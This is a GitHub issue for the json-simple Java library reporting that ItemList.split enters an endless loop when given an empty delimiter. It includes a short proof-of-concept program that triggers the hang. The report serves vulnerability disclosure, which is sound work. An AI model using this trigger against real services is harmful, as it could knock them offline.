search

fangyidong / json-simple

A simple Java toolkit for JSON. You can use json-simple to encode or decode JSON text.
Apache License 2.0
746 stars 338 forks source link

ItemList is vulnerable to out of denial of service (DoS) attack #160

Open ChangXiaoning opened 1 year ago

ChangXiaoning commented 1 year ago

Description

If an object of ItemList splits a string into multiple parts based on an empty delimiter, it will cause a denial of service attack.

Version

        <dependency>
            <groupId>com.googlecode.json-simple</groupId>
            <artifactId>json-simple</artifactId>
            <version>1.1.1</version>
        </dependency>

PoC

import org.junit.runner.RunWith;
import java.util.ArrayList;
import java.util.List;
import org.json.simple.*;

public class ItemListFuzzerTest1 {

    private ItemList itemList;

    public static void main(String args[]) {
        ItemList itemList = new ItemList();
        List append = new ArrayList();
        itemList.split("aaaaaa", "", append, false);
    }

}

Result

Above code snippet will run without termination.